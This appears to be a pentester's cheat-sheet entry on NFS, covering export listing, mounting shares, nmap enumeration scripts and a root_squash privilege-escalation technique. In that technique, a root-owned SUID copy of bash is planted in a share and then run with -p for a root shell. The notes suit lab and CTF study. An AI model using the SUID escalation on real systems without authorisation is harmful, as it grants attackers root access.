Network File System (NFS)

footprinting linuxprivilegeescalation networkservices2

Network File System (NFS) is a protocol allowing a computer to mount a remote folder on its local file system.

🐊️ Port: 2049 (TCP)

NFS is based and utilises RPC for exchanges. It uses External Data Representation (XDR) for data serialization.

List mounts πŸ—ΊοΈ

$ showmount -e IP
# see NFS exports
$ cat /etc/exports

Mount/Unmount 🀘

The command below will mount the remote folder /share inside /tmp/share on our machine. It means that when we browse /tmp/share, we will see the files inside /share on the remote host.

# sudo apt install nfs-common
$ mkdir /tmp/share
$ sudo mount -t nfs IP:/share /tmp/share/ # [-nolock]
# there is also variants (with/without vers=2): 
# sudo mount -o rw,vers=2 IP:/share /tmp/share/
# unmount
$ sudo umount /tmp/share

NFS vulnerabilities ☠️

linprivesc linuxprivesc kenobi

  • It's possible to use nmap to get information about NFS shares:
$ nmap IP -p 2049 --script=nfs-ls,nfs-statfs,nfs-showmount
$ sudo nmap IP -p111,2049 -sV --script nfs*
$ sudo nmap IP -p111,2049 -sV -sC
  • When root_squashing is disabled, a local root user is mapped to the remote root user, allowing them to create SUID files.
# on the remote host, we create a bash inside the share
$ cp /bin/bash /share/sbash
# on the local host
# we give the file root privileges
$ sudo chown root /tmp/share/sbash
$ sudo chmod +s /tmp/share/sbash
# Then on the host, running the SUID file
# will run it as root
$ /share/sbash -p

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.


  • nfs-utils (ubuntu), nfs-ganesha (solaris), openNFS (RedHat)
  • nfsstat
  • nfswatch
  • DoS
  • systemctl restart nfs-kernel-server ; exportfs

Add an export

  • echo '/tmp/share CIDR(sync,no_subtree_check)' >> /etc/exports